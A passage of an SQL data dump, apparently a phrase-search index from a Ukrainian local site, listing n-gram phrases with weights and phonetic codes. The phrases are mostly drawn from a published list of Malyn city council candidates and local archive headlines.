зображували',0,1,1.5333,'я000',1,'*'),(1604119,'якій зображували козаків','якій зображували козаків',0,1,1.8,'я000',1,'*'),(1604120,'який асоціюється','який асоціюється',0,1,1.5333,'я000',1,'*'),(1604121,'який асоціюється з','який асоціюється з',0,1,1.6,'я000',1,'*'),(1604122,'якими','якими',0,0,0.3333,'я000',1,'*'),(1604123,'якими козаки','якими козаки',0,1,1.4,'я000',1,'*'),(1604124,'якими козаки виступали','якими козаки виступали',0,1,1.7333,'я000',1,'*'),(1604125,'яку','яку',0,0,0.2,'я000',2,'*'),(1604126,'яку носять','яку носять',0,1,1.3333,'я000',1,'*'),(1604127,'яку носять священники','яку носять священники',0,1,1.7,'я000',1,'*'),(1604952,'2481','2481',0,0,0.4,'',1,'*'),(1604953,'9 misyatsiv','9 misyatsiv',0,1,1.3667,'M2321',1,'*'),(1604954,'9 misyatsiv 2020','9 misyatsiv 2020',0,1,1.5333,'M2321',1,'*'),(1604955,'9 місяців','9 місяців',0,1,1.3,'м000',1,'*'),(1604956,'9 місяців 2020','9 місяців 2020',0,1,1.4667,'м000',1,'*'),(1604957,'otg za 9','otg za 9',0,1,1.2667,'O320',1,'*'),(1604958,'za 9','za 9',0,1,1.1333,'Z000',1,'*'),(1604959,'za 9 misyatsiv','za 9 misyatsiv',0,1,1.4667,'Z52321',1,'*'),(1604960,'за 9','за 9',0,1,1.1333,'з000',1,'*'),(1604961,'за 9 місяців','за 9 місяців',0,1,1.4,'з000',1,'*'),(1604962,'отг за 9','отг за 9',0,1,1.2667,'о000',1,'*'),(1605060,'2482','2482',0,0,0.4,'',1,'*'),(1605061,'arkhivni','arkhivni',0,0,0.5333,'A6215',1,'*'),(1605062,'arkhivni materiali','arkhivni materiali',0,1,1.6,'A6215364',1,'*'),(1605063,'istoriya','istoriya',0,0,0.5333,'I236',1,'*'),(1605064,'istoriya arkhivni','istoriya arkhivni',0,1,1.5667,'I236215',1,'*'),(1605065,'istoriya arkhivni materiali','istoriya arkhivni materiali',0,1,1.9,'I236215364',1,'*'),(1605066,'korotka','korotka',0,0,0.4667,'K632',1,'*'),(1605067,'korotka istoriya','korotka istoriya',0,1,1.5333,'K63236',1,'*'),(1605068,'korotka istoriya arkhivni','korotka istoriya arkhivni',0,1,1.8333,'K63236215',1,'*'),(1605069,'malin','malin',0,0,0.3333,'M450',3,'*'),(1605070,'malin korotka','malin korotka',0,1,1.4333,'M452632',1,'*'),(1605071,'malin korotka istoriya','malin korotka istoriya',0,1,1.7333,'M45263236',1,'*'),(1605072,'materiali','materiali',0,0,0.6,'M364',2,'*'),(1605073,'orkestr','orkestr',0,0,0.4667,'O6236',1,'*'),(1605074,'orkestr malin','orkestr malin',0,1,1.4333,'O6236545',1,'*'),(1605075,'orkestr malin korotka','orkestr malin korotka',0,1,1.7,'O62365452632',1,'*'),(1605076,'історія архівні','історія архівні',0,1,1.5,'і000',1,'*'),(1605077,'історія архівні матеріали','історія архівні матеріали',0,1,1.8333,'і000',1,'*'),(1605078,'архівні','архівні',0,0,0.4667,'а000',1,'*'),(1605079,'архівні матеріали','архівні матеріали',0,1,1.5667,'а000',1,'*'),(1605080,'коротка','коротка',0,0,0.4667,'к000',1,'*'),(1605081,'коротка історія','коротка історія',0,1,1.5,'к000',1,'*'),(1605082,'коротка історія архівні','коротка історія архівні',0,1,1.7667,'к000',1,'*'),(1605083,'малин','малин',0,0,0.3333,'м000',11,'*'),(1605084,'малин коротка','малин коротка',0,1,1.4333,'м000',1,'*'),(1605085,'малин коротка історія','малин коротка історія',0,1,1.7,'м000',1,'*'),(1605086,'матеріали','матеріали',0,0,0.6,'м000',2,'*'),(1605087,'оркестр','оркестр',0,0,0.4667,'о000',1,'*'),(1605088,'оркестр малин','оркестр малин',0,1,1.4333,'о000',1,'*'),(1605089,'оркестр малин коротка','оркестр малин коротка',0,1,1.7,'о000',1,'*'),(1613279,'1 1','1 1',0,1,1.1,'',3,'*'),(1613280,'1 1 будник','1 1 будник',0,1,1.3333,'б000',1,'*'),(1613281,'1 будник','1 будник',0,1,1.2667,'б000',2,'*'),(1613282,'1 будник марія','1 будник марія',0,1,1.4667,'б000',2,'*'),(1613283,'1 кудрицька','1 кудрицька',0,1,1.3667,'к000',1,'*'),(1613284,'1 кудрицька ольга','1 кудрицька ольга',0,1,1.5667,'к000',1,'*'),(1613285,'1 малегус','1 малегус',0,1,1.3,'м000',1,'*'),(1613286,'1 малегус ігор','1 малегус ігор',0,1,1.4667,'м000',1,'*'),(1613287,'1 марек','1 марек',0,1,1.2333,'м000',1,'*'),(1613288,'1 марек ігорстаніславович','1 марек ігорстаніславович',0,1,1.8333,'м000',1,'*'),(1613289,'10 дідківська','10 дідківська',0,1,1.4333,'д000',1,'*'),(1613290,'10 дідківська наталія','10 дідківська наталія',0,1,1.7,'д000',1,'*'),(1613291,'10 заречна','10 заречна',0,1,1.3333,'з000',1,'*'),(1613292,'10 заречна лілія','10 заречна лілія',0,1,1.5333,'з000',1,'*'),(1613293,'11','11',0,0,0.2,'',2,'*'),(1613294,'11 кравець','11 кравець',0,1,1.3333,'к000',1,'*'),(1613295,'11 кравець леонід','11 кравець леонід',0,1,1.5667,'к000',1,'*'),(1613296,'11 осадчий','11 осадчий',0,1,1.3333,'о000',1,'*'),(1613297,'11 осадчий олександр','11 осадчий олександр',0,1,1.6667,'о000',1,'*'),(1613298,'2 1','2 1',0,1,1.1,'',1,'*'),(1613299,'2 1 кудрицька','2 1 кудрицька',0,1,1.4333,'к000',1,'*'),(1613300,'2 марченко','2 марченко',0,1,1.3333,'м000',1,'*'),(1613301,'2 марченко лариса','2 марченко лариса',0,1,1.5667,'м000',1,'*'),(1613302,'2 мельник','2 мельник',0,1,1.3,'м000',2,'*'),(1613303,'2 мельник олег','2 мельник олег',0,1,1.4667,'м000',2,'*'),(1613304,'2 раєць','2 раєць',0,1,1.2333,'р000',2,'*'),(1613305,'2 раєць ігор','2 раєць ігор',0,1,1.4,'р000',1,'*'),(1613306,'2 хоменко','2 хоменко',0,1,1.3,'х000',1,'*'),(1613307,'2 хоменко віктор','2 хоменко віктор',0,1,1.5333,'х000',1,'*'),(1613308,'2476','2476',0,0,0.4,'',1,'*'),(1613309,'3 1','3 1',0,1,1.1,'',1,'*'),(1613310,'3 1 малегус','3 1 малегус',0,1,1.3667,'м000',1,'*'),(1613311,'3 єнько','3 єнько',0,1,1.2333,'є000',1,'*'),(1613312,'3 єнько валентина','3 єнько валентина',0,1,1.5667,'є000',1,'*'),(1613313,'3 мазур','3 мазур',0,1,1.2333,'м000',1,'*'),(1613314,'3 мазур микола','3 мазур микола',0,1,1.4667,'м000',1,'*'),(1613315,'3 ничипоренко','3 ничипоренко',0,1,1.4333,'н000',1,'*'),(1613316,'3 ничипоренко руслана','3 ничипоренко руслана',0,1,1.7,'н000',1,'*'),(1613317,'3 пустовойтенко','3 пустовойтенко',0,1,1.5,'п000',1,'*'),(1613318,'3 пустовойтенко олександр','3 пустовойтенко олександр',0,1,1.8333,'п000',1,'*'),(1613319,'4 1','4 1',0,1,1.1,'',1,'*'),(1613320,'4 1 марек','4 1 марек',0,1,1.3,'м000',1,'*'),(1613321,'4 комарчук','4 комарчук',0,1,1.3333,'к000',1,'*'),(1613322,'4 комарчук василь','4 комарчук василь',0,1,1.5667,'к000',1,'*'),(1613323,'4 прокопчук','4 прокопчук',0,1,1.3667,'п000',1,'*'),(1613324,'4 прокопчук валерій','4 прокопчук валерій',0,1,1.6333,'п000',1,'*'),(1613325,'4 степанець','4 степанець',0,1,1.3667,'с000',1,'*'),(1613326,'4 степанець марина','4 степанець марина',0,1,1.6,'с000',1,'*'),(1613327,'4 філоненко','4 філоненко',0,1,1.3667,'ф000',1,'*'),(1613328,'4 філоненко олександр','4 філоненко олександр',0,1,1.7,'ф000',1,'*'),(1613329,'5 галицька','5 галицька',0,1,1.3333,'г000',1,'*'),(1613330,'5 галицька світлана','5 галицька світлана',0,1,1.6333,'г000',1,'*'),(1613331,'5 гостін','5 гостін',0,1,1.2667,'г000',1,'*'),(1613332,'5 гостін надія','5 гостін надія',0,1,1.4667,'г000',1,'*'),(1613333,'5 карпенко','5 карпенко',0,1,1.3333,'к000',1,'*'),(1613334,'5 карпенко світлана','5 карпенко світлана',0,1,1.6333,'к000',1,'*'),(1613335,'5 нікітіна','5 нікітіна',0,1,1.3333,'н000',1,'*'),(1613336,'5 нікітіна валентина','5 нікітіна валентина',0,1,1.6667,'н000',1,'*'),(1613337,'6 гладких','6 гладких',0,1,1.3,'г000',1,'*'),(1613338,'6 гладких олександр','6 гладких олександр',0,1,1.6333,'г000',1,'*'),(1613339,'6 коломійчук','6 коломійчук',0,1,1.4,'к000',1,'*'),(1613340,'6 коломійчук олександра','6 коломійчук олександра',0,1,1.7667,'к000',1,'*'),(1613341,'6 лось','6 лось',0,1,1.2,'л000',1,'*'),(1613342,'6 лось павло','6 лось павло',0,1,1.4,'л000',1,'*'),(1613343,'7 петренко','7 петренко',0,1,1.3333,'п000',1,'*'),(1613344,'7 петренко павло','7 петренко павло',0,1,1.5333,'п000',1,'*'),(1613345,'7 хоменко','7 хоменко',0,1,1.3,'х000',1,'*'),(1613346,'7 хоменко дмитро','7 хоменко дмитро',0,1,1.5333,'х000',1,'*'),(1613347,'8 гончар','8 гончар',0,1,1.2667,'г000',1,'*'),(1613348,'8 гончар василь','8 гончар василь',0,1,1.5,'г000',1,'*'),(1613349,'8 черняк','8 черняк',0,1,1.2667,'ч000',1,'*'),(1613350,'8 черняк артем','8 черняк артем',0,1,1.4667,'ч000',1,'*'),(1613351,'9 онопрійчук','9 онопрійчук',0,1,1.4,'о000',1,'*'),(1613352,'9 онопрійчук наталія','9 онопрійчук наталія',0,1,1.6667,'о000',1,'*'),(1613353,'9 федьович','9 федьович',0,1,1.3333,'ф000',1,'*'),(1613354,'9 федьович іван','9 федьович іван',0,1,1.5,'ф000',1,'*'),(1613355,'deputati','deputati',0,0,0.5333,'D130',3,'*'),(1613356,'deputati do','deputati do',0,1,1.3667,'D130',1,'*'),(1613357,'deputati do malinskoji','deputati do malinskoji',0,1,1.7333,'D135452',1,'*'),(1613358,'kandidativ','kandidativ',0,0,0.6667,'K531',1,'*'),(1613359,'kandidativ u','kandidativ u',0,1,1.4,'K531',1,'*'),(1613360,'kandidativ u deputati','kandidativ u deputati',0,1,1.7,'K531313',1,'*'),(1613361,'miskoji radi po','miskoji radi po',0,1,1.5,'M2631',1,'*'),(1613362,'okrugakh','okrugakh',0,0,0.5333,'O262',1,'*'),(1613363,'po okrugakh','po okrugakh',0,1,1.3667,'P262',1,'*'),(1613364,'radi po','radi po',0,1,1.2333,'R310',1,'*'),(1613365,'radi po okrugakh','radi po okrugakh',0,1,1.5333,'R31262',1,'*'),(1613366,'spisok','spisok',0,0,0.4,'S120',1,'*'),(1613367,'spisok kandidativ','spisok kandidativ',0,1,1.5667,'S12531',1,'*'),(1613368,'spisok kandidativ u','spisok kandidativ u',0,1,1.6333,'S12531',1,'*'),(1613369,'u deputati','u deputati',0,1,1.3333,'U313',1,'*'),(1613370,'u deputati do','u deputati do',0,1,1.4333,'U313',1,'*'),(1613371,'«єс»','«єс»',0,0,0.2667,'є000',1,'*'),(1613372,'«єс» виборчий','«єс» виборчий',0,1,1.4333,'є000',1,'*'),(1613373,'«єс» виборчий округ','«єс» виборчий округ',0,1,1.6333,'є000',1,'*'),(1613374,'євгенович','євгенович',0,0,0.6,'є000',2,'*'),(1613375,'євгенович 2','євгенович 2',0,1,1.3667,'є000',1,'*'),(1613376,'євгенович 2 раєць','євгенович 2 раєць',0,1,1.5667,'є000',1,'*'),(1613377,'євгенович 4','євгенович 4',0,1,1.3667,'є000',1,'*'),(1613378,'євгенович 4 степанець','євгенович 4 степанець',0,1,1.7,'є000',1,'*'),(1613379,'єнько','єнько',0,0,0.3333,'є000',1,'*'),(1613380,'єнько валентина','єнько валентина',0,1,1.5,'є000',1,'*'),(1613381,'єнько валентина миколаївна','єнько валентина миколаївна',0,1,1.8667,'є000',1,'*'),(1613382,'іанівна','іанівна',0,0,0.4667,'і000',1,'*'),(1613383,'іанівна 5','іанівна 5',0,1,1.3,'і000',1,'*'),(1613384,'іанівна 5 гостін','іанівна 5 гостін',0,1,1.5333,'і000',1,'*'),(1613385,'іван','іван',0,0,0.2667,'і000',1,'*'),(1613386,'іван володимирович','іван володимирович',0,1,1.6,'і000',1,'*'),(1613387,'іван володимирович 10','іван володимирович 10',0,1,1.7,'і000',1,'*'),(1613388,'ігор','ігор',0,0,0.2667,'і000',2,'*'),(1613389,'ігор євгенович','ігор євгенович',0,1,1.4667,'і000',2,'*'),(1613390,'ігор євгенович 2','ігор євгенович 2',0,1,1.5333,'і000',1,'*'),(1613391,'ігор васильович','ігор васильович',0,1,1.5,'і000',1,'*'),(1613392,'ігор васильович 3','ігор васильович 3',0,1,1.5667,'і000',1,'*'),(1613393,'ігорстаніславович','ігорстаніславович',0,0,1,'і000',1,'*'),(1613394,'ігорстаніславович 2','ігорстаніславович 2',0,1,1.6333,'і000',1,'*'),(1613395,'ігорстаніславович 2 марченко','ігорстаніславович 2 марченко',0,1,1.9333,'і000',1,'*'),(1613396,'анатолійович','анатолійович',0,0,0.8,'а000',2,'*'),(1613397,'анатолійович 5','анатолійович 5',0,1,1.4667,'а000',1,'*'),(1613398,'анатолійович 5 нікітіна','анатолійович 5 нікітіна',0,1,1.7667,'а000',1,'*'),(1613399,'артем','артем',0,0,0.3333,'а000',1,'*'),(1613400,'артем борисович','артем борисович',0,1,1.5,'а000',1,'*'),(1613401,'артем борисович 9','артем борисович 9',0,1,1.5667,'а000',1,'*'),(1613402,'борисович','борисович',0,0,0.6,'б000',1,'*'),(1613403,'борисович 9','борисович 9',0,1,1.3667,'б000',1,'*'),(1613404,'борисович 9 онопрійчук','борисович 9 онопрійчук',0,1,1.7333,'б000',1,'*'),(1613405,'броніславівна','броніславівна',0,0,0.8667,'б000',1,'*'),(1613406,'будник','будник',0,0,0.4,'б000',2,'*'),(1613407,'будник марія','будник марія',0,1,1.4,'б000',2,'*'),(1613408,'будник марія миколаївна','будник марія миколаївна',0,1,1.7667,'б000',2,'*'),(1613409,'в депутати','в депутати',0,1,1.3333,'в000',1,'*'),(1613410,'в депутати до','в депутати до',0,1,1.4333,'в000',1,'*'),(1613411,'від малинської','від малинської',0,1,1.4667,'в000',1,'*'),(1613412,'від малинської міської','від малинської міської',0,1,1.7333,'в000',1,'*'),(1613413,'віктор','віктор',0,0,0.4,'в000',3,'*'),(1613414,'віктор васильович','віктор васильович',0,1,1.5667,'в000',2,'*'),(1613415,'віктор васильович 3','віктор васильович 3',0,1,1.6333,'в000',1,'*'),(1613416,'віталійович','віталійович',0,0,0.7333,'в000',1,'*'),(1613417,'віталійович виборчий','віталійович виборчий',0,1,1.6667,'в000',1,'*'),(1613418,'віталійович виборчий округ','віталійович виборчий округ',0,1,1.8667,'в000',1,'*'),(1613419,'валентина','валентина',0,0,0.6,'в000',2,'*'),(1613420,'валентина броніславівна','валентина броніславівна',0,1,1.7667,'в000',1,'*'),(1613421,'валентина миколаївна','валентина миколаївна',0,1,1.6667,'в000',1,'*'),(1613422,'валентина миколаївна 4','валентина миколаївна 4',0,1,1.7333,'в000',1,'*'),(1613423,'валентинович','валентинович',0,0,0.8,'в000',1,'*'),(1613424,'валентинович 4','валентинович 4',0,1,1.4667,'в000',1,'*'),(1613425,'валентинович 4 філоненко','валентинович 4 філоненко',0,1,1.8,'в000',1,'*'),(1613426,'валерій','валерій',0,0,0.4667,'в000',2,'*'),(1613427,'валерій володимирович','валерій володимирович',0,1,1.7,'в000',1,'*'),(1613428,'валерій володимирович 5','валерій володимирович 5',0,1,1.7667,'в000',1,'*'),(1613429,'василівна','василівна',0,0,0.6,'в000',3,'*'),(1613430,'василівна 2','василівна 2',0,1,1.3667,'в000',1,'*'),(1613431,'василівна 2 мельник','василівна 2 мельник',0,1,1.6333,'в000',1,'*'),(1613432,'василівна 4','василівна 4',0,1,1.3667,'в000',1,'*'),(1613433,'василівна 4 комарчук','василівна 4 комарчук',0,1,1.6667,'в000',1,'*'),(1613434,'василь','василь',0,0,0.4,'в000',2,'*'),(1613435,'василь анатолійович','василь анатолійович',0,1,1.6333,'в000',1,'*'),(1613436,'василь анатолійович 5','василь анатолійович 5',0,1,1.7,'в000',1,'*'),(1613437,'василь васильович','василь васильович',0,1,1.5667,'в000',1,'*'),(1613438,'василь васильович 9','василь васильович 9',0,1,1.6333,'в000',1,'*'),(1613439,'васильович','васильович',0,0,0.6667,'в000',3,'*'),(1613440,'васильович 3','васильович 3',0,1,1.4,'в000',1,'*'),(1613441,'васильович 3 єнько','васильович 3 єнько',0,1,1.6,'в000',1,'*'),(1613442,'васильович 3 мазур','васильович 3 мазур',0,1,1.6,'в000',1,'*'),(1613443,'васильович 3 пустовойтенко','васильович 3 пустовойтенко',0,1,1.8667,'в000',1,'*'),(1613444,'васильович 7','васильович 7',0,1,1.4,'в000',1,'*'),(1613445,'васильович 7 хоменко','васильович 7 хоменко',0,1,1.6667,'в000',1,'*'),(1613446,'васильович 8','васильович 8',0,1,1.4,'в000',1,'*'),(1613447,'васильович 8 черняк','васильович 8 черняк',0,1,1.6333,'в000',1,'*'),(1613448,'васильович 9','васильович 9',0,1,1.4,'в000',1,'*'),(1613449,'васильович 9 федьович','васильович 9 федьович',0,1,1.7,'в000',1,'*'),(1613450,'виборчий округ','виборчий округ',0,1,1.4667,'в000',2,'*'),(1613451,'виборчий округ 1','виборчий округ 1',0,1,1.5333,'в000',1,'*'),(1613452,'виборчий округ 2','виборчий округ 2',0,1,1.5333,'в000',1,'*'),(1613453,'виборчий округ 3','виборчий округ 3',0,1,1.5333,'в000',1,'*'),(1613454,'виборчий округ 4','виборчий округ 4',0,1,1.5333,'в000',1,'*'),(1613455,'володимирівна','володимирівна',0,0,0.8667,'в000',3,'*'),(1613456,'володимирівна 10','володимирівна 10',0,1,1.5333,'в000',1,'*'),(1613457,'володимирівна 10 дідківська','володимирівна 10 дідківська',0,1,1.9,'в000',1,'*'),(1613458,'володимирівна 11','володимирівна 11',0,1,1.5333,'в000',1,'*'),(1613459,'володимирівна 11 кравець','володимирівна 11 кравець',0,1,1.8,'в000',1,'*'),(1613460,'володимирович','володимирович',0,0,0.8667,'в000',3,'*'),(1613461,'володимирович 10','володимирович 10',0,1,1.5333,'в000',1,'*'),(1613462,'володимирович 10 заречна','володимирович 10 заречна',0,1,1.8,'в000',1,'*'),(1613463,'володимирович 5','володимирович 5',0,1,1.5,'в000',1,'*'),(1613464,'володимирович 5 карпенко','володимирович 5 карпенко',0,1,1.8,'в000',1,'*'),(1613465,'володимирович виборчий','володимирович виборчий',0,1,1.7333,'в000',1,'*'),(1613466,'володимирович виборчий округ','володимирович виборчий округ',0,1,1.9333,'в000',1,'*'),(1613467,'галицька','галицька',0,0,0.5333,'г000',1,'*'),(1613468,'галицька світлана','галицька світлана',0,1,1.5667,'г000',1,'*'),(1613469,'галицька світлана петрівна','галицька світлана петрівна',0,1,1.8667,'г000',1,'*'),(1613470,'геннадіївна','геннадіївна',0,0,0.7333,'г000',1,'*'),(1613471,'геннадіївна 6','геннадіївна 6',0,1,1.4333,'г000',1,'*'),(1613472,'геннадіївна 6 лось','геннадіївна 6 лось',0,1,1.6,'г000',1,'*'),(1613473,'гладких','гладких',0,0,0.4667,'г000',1,'*'),(1613474,'гладких олександр','гладких олександр',0,1,1.5667,'г000',1,'*'),(1613475,'гладких олександр васильович','гладких олександр васильович',0,1,1.9333,'г000',1,'*'),(1613476,'гончар','гончар',0,0,0.4,'г000',1,'*'),(1613477,'гончар василь','гончар василь',0,1,1.4333,'г000',1,'*'),(1613478,'гончар василь васильович','гончар василь васильович',0,1,1.8,'г000',1,'*'),(1613479,'гостін','гостін',0,0,0.4,'г000',1,'*'),(1613480,'гостін надія','гостін надія',0,1,1.4,'г000',1,'*'),(1613481,'гостін надія геннадіївна','гостін надія геннадіївна',0,1,1.8,'г000',1,'*'),(1613482,'григорівна','григорівна',0,0,0.6667,'г000',1,'*'),(1613483,'григорівна 11','григорівна 11',0,1,1.4333,'г000',1,'*'),(1613484,'григорівна 11 осадчий','григорівна 11 осадчий',0,1,1.7,'г000',1,'*'),(1613485,'дідківська','дідківська',0,0,0.6667,'д000',1,'*'),(1613486,'дідківська наталія','дідківська наталія',0,1,1.6,'д000',1,'*'),(1613487,'дідківська наталія григорівна','дідківська наталія григорівна',0,1,1.9667,'д000',1,'*'),(1613488,'депутати до','депутати до',0,1,1.3667,'д000',1,'*'),(1613489,'депутати до малинської','депутати до малинської',0,1,1.7333,'д000',1,'*'),(1613490,'дмитро','дмитро',0,0,0.4,'д000',2,'*'),(1613491,'дмитро васильович','дмитро васильович',0,1,1.5667,'д000',2,'*'),(1613492,'дмитро васильович 8','дмитро васильович 8',0,1,1.6333,'д000',1,'*'),(1613493,'заречна','заречна',0,0,0.4667,'з000',1,'*'),(1613494,'заречна лілія','заречна лілія',0,1,1.4333,'з000',1,'*'),(1613495,'заречна лілія володимирівна','заречна лілія володимирівна',0,1,1.9,'з000',1,'*'),(1613496,'кандидатів','кандидатів',0,0,0.6667,'к000',2,'*'),(1613497,'кандидатів у','кандидатів у',0,1,1.4,'к000',2,'*'),(1613498,'кандидатів у депутати','кандидатів у депутати',0,1,1.7,'к000',2,'*'),(1613499,'кандидати в','кандидати в',0,1,1.3667,'к000',1,'*'),(1613500,'кандидати в депутати','кандидати в депутати',0,1,1.6667,'к000',1,'*'),(1613501,'карпенко','карпенко',0,0,0.5333,'к000',2,'*'),(1613502,'карпенко світлана','карпенко світлана',0,1,1.5667,'к000',1,'*'),(1613503,'карпенко світлана леонідівна','карпенко світлана леонідівна',0,1,1.9333,'к000',1,'*'),(1613504,'коломійчук','коломійчук',0,0,0.6667,'к000',1,'*'),(1613505,'коломійчук олександра','коломійчук олександра',0,1,1.7,'к000',1,'*'),(1613506,'коломійчук олександра миколаївна','коломійчук олександра миколаївна',0,1,2,'к000',1,'*'),(1613507,'комарчук','комарчук',0,0,0.5333,'к000',1,'*'),(1613508,'комарчук василь','комарчук василь',0,1,1.5,'к000',1,'*'),(1613509,'комарчук василь анатолійович','комарчук василь анатолійович',0,1,1.9333,'к000',1,'*'),(1613510,'кравець','кравець',0,0,0.4667,'к000',1,'*'),(1613511,'кравець леонід','кравець леонід',0,1,1.4667,'к000',1,'*'),(1613512,'кравець леонід петрович','кравець леонід петрович',0,1,1.7667,'к000',1,'*'),(1613513,'кудрицька','кудрицька',0,0,0.6,'к000',1,'*'),(1613514,'кудрицька ольга','кудрицька ольга',0,1,1.5,'к000',1,'*'),(1613515,'кудрицька ольга василівна','кудрицька ольга василівна',0,1,1.8333,'к000',1,'*'),(1613516,'лілія','лілія',0,0,0.3333,'л000',1,'*'),(1613517,'лілія володимирівна','лілія володимирівна',0,1,1.6333,'л000',1,'*'),(1613518,'лілія володимирівна 11','лілія володимирівна 11',0,1,1.7333,'л000',1,'*'),(1613519,'лариса','лариса',0,0,0.4,'л000',2,'*'),(1613520,'лариса миколаївна','лариса миколаївна',0,1,1.5667,'л000',2,'*'),(1613521,'лариса миколаївна 3','лариса миколаївна 3',0,1,1.6333,'л000',1,'*'),(1613522,'леонід','леонід',0,0,0.4,'л000',1,'*'),(1613523,'леонід петрович','леонід петрович',0,1,1.5,'л000',1,'*'),(1613524,'леонід петрович виборчий','леонід петрович виборчий',0,1,1.8,'л000',1,'*'),(1613525,'леонідівна','леонідівна',0,0,0.6667,'л000',1,'*'),(1613526,'леонідівна 6','леонідівна 6',0,1,1.4,'л000',1,'*'),(1613527,'леонідівна 6 коломійчук','леонідівна 6 коломійчук',0,1,1.7667,'л000',1,'*'),(1613528,'лось','лось',0,0,0.2667,'л000',1,'*'),(1613529,'лось павло','лось павло',0,1,1.3333,'л000',1,'*'),(1613530,'лось павло віталійович','лось павло віталійович',0,1,1.7333,'л000',1,'*'),(1613531,'міської організації','міської організації',0,1,1.6333,'м000',1,'*'),(1613532,'міської організації партії','міської організації партії',0,1,1.8667,'м000',1,'*'),(1613533,'міської ради від','міської ради від',0,1,1.5333,'м000',1,'*'),(1613534,'міської ради по','міської ради по',0,1,1.5,'м000',1,'*'),(1613535,'мазур','мазур',0,0,0.3333,'м000',1,'*'),(1613536,'мазур микола','мазур микола',0,1,1.4,'м000',1,'*'),(1613537,'мазур микола євгенович','мазур микола євгенович',0,1,1.7333,'м000',1,'*'),(1613538,'малегус','малегус',0,0,0.4667,'м000',2,'*'),(1613539,'малегус ігор','малегус ігор',0,1,1.4,'м000',2,'*'),(1613540,'малегус ігор євгенович','малегус ігор євгенович',0,1,1.7333,'м000',2,'*'),(1613541,'малинської міської організації','малинської міської організації',0,1,2,'м000',1,'*'),(1613542,'марія миколаївна','марія миколаївна',0,1,1.5333,'м000',2,'*'),(1613543,'марія миколаївна 2','марія миколаївна 2',0,1,1.6,'м000',1,'*'),(1613544,'марек','марек',0,0,0.3333,'м000',1,'*'),(1613545,'марек ігорстаніславович','марек ігорстаніславович',0,1,1.7667,'м000',1,'*'),(1613546,'марек ігорстаніславович 2','марек ігорстаніславович 2',0,1,1.8333,'м000',1,'*'),(1613547,'марина','марина',0,0,0.4,'м000',1,'*'),(1613548,'марина іанівна','марина іанівна',0,1,1.4667,'м000',1,'*'),(1613549,'марина іанівна 5','марина іанівна 5',0,1,1.5333,'м000',1,'*'),(1613550,'марченко','марченко',0,0,0.5333,'м000',1,'*'),(1613551,'марченко лариса','марченко лариса',0,1,1.5,'м000',1,'*'),(1613552,'марченко лариса миколаївна','марченко лариса миколаївна',0,1,1.8667,'м000',1,'*'),(1613553,'мельник','мельник',0,0,0.4667,'м000',2,'*'),(1613554,'мельник олег','мельник олег',0,1,1.4,'м000',2,'*'),(1613555,'мельник олег васильович','мельник олег васильович',0,1,1.7667,'м000',2,'*'),(1613556,'микола','микола',0,0,0.4,'м000',3,'*'),(1613557,'микола євгенович','микола євгенович',0,1,1.5333,'м000',1,'*'),(1613558,'микола євгенович 4','микола євгенович 4',0,1,1.6,'м000',1,'*'),(1613559,'миколаївна','миколаївна',0,0,0.6667,'м000',3,'*'),(1613560,'миколаївна 2','миколаївна 2',0,1,1.4,'м000',1,'*'),(1613561,'миколаївна 2 хоменко','миколаївна 2 хоменко',0,1,1.6667,'м000',1,'*'),(1613562,'миколаївна 3','миколаївна 3',0,1,1.4,'м000',1,'*'),(1613563,'миколаївна 3 ничипоренко','миколаївна 3 ничипоренко',0,1,1.8,'м000',1,'*'),(1613564,'миколаївна 4','миколаївна 4',0,1,1.4,'м000',1,'*'),(1613565,'миколаївна 4 прокопчук','миколаївна 4 прокопчук',0,1,1.7333,'м000',1,'*'),(1613566,'миколаївна 7','миколаївна 7',0,1,1.4,'м000',1,'*'),(1613567,'миколаївна 7 петренко','миколаївна 7 петренко',0,1,1.7,'м000',1,'*'),(1613568,'нікітіна','нікітіна',0,0,0.5333,'н000',1,'*'),(1613569,'нікітіна валентина','нікітіна валентина',0,1,1.6,'н000',1,'*'),(1613570,'нікітіна валентина броніславівна','нікітіна валентина броніславівна',0,1,2,'н000',1,'*'),(1613571,'надія','надія',0,0,0.3333,'н000',2,'*'),(1613572,'надія геннадіївна','надія геннадіївна',0,1,1.5667,'н000',1,'*'),(1613573,'надія геннадіївна 6','надія геннадіївна 6',0,1,1.6333,'н000',1,'*'),(1613574,'наталія','наталія',0,0,0.4667,'н000',2,'*'),(1613575,'наталія володимирівна','наталія володимирівна',0,1,1.7,'н000',1,'*'),(1613576,'наталія володимирівна 10','наталія володимирівна 10',0,1,1.8,'н000',1,'*'),(1613577,'наталія григорівна','наталія григорівна',0,1,1.6,'н000',1,'*'),(1613578,'наталія григорівна 11','наталія григорівна 11',0,1,1.7,'н000',1,'*'),(1613579,'ничипоренко','ничипоренко',0,0,0.7333,'н000',1,'*'),(1613580,'ничипоренко руслана','ничипоренко руслана',0,1,1.6333,'н000',1,'*'),(1613581,'ничипоренко руслана василівна','ничипоренко руслана василівна',0,1,1.9667,'н000',1,'*'),(1613582,'округ 1 1','округ 1 1',0,1,1.3,'о000',1,'*'),(1613583,'округ 2 1','округ 2 1',0,1,1.3,'о000',1,'*'),(1613584,'округ 3 1','округ 3 1',0,1,1.3,'о000',1,'*'),(1613585,'округ 4 1','округ 4 1',0,1,1.3,'о000',1,'*'),(1613586,'округах','округах',0,0,0.4667,'о000',1,'*'),(1613587,'олег','олег',0,0,0.2667,'о000',2,'*'),(1613588,'олег васильович','олег васильович',0,1,1.5,'о000',2,'*'),(1613589,'олег васильович 3','олег васильович 3',0,1,1.5667,'о000',1,'*'),(1613590,'олександр','олександр',0,0,0.6,'о000',3,'*'),(1613591,'олександр валентинович','олександр валентинович',0,1,1.7333,'о000',1,'*'),(1613592,'олександр валентинович 4','олександр валентинович 4',0,1,1.8,'о000',1,'*'),(1613593,'олександр васильович','олександр васильович',0,1,1.6667,'о000',3,'*'),(1613594,'олександр васильович 7','олександр васильович 7',0,1,1.7333,'о000',1,'*'),(1613595,'олександр володимирович','олександр володимирович',0,1,1.7667,'о000',2,'*'),(1613596,'олександр володимирович виборчий','олександр володимирович виборчий',0,1,2,'о000',1,'*'),(1613597,'олександр петрович','олександр петрович',0,1,1.6,'о000',1,'*'),(1613598,'олександр петрович 5','олександр петрович 5',0,1,1.6667,'о000',1,'*'),(1613599,'олександра','олександра',0,0,0.6667,'о000',2,'*'),(1613600,'олександра миколаївна','олександра миколаївна',0,1,1.7,'о000',1,'*'),(1613601,'олександра миколаївна 7','олександра миколаївна 7',0,1,1.7667,'о000',1,'*'),(1613602,'ольга','ольга',0,0,0.3333,'о000',2,'*'),(1613603,'ольга василівна','ольга 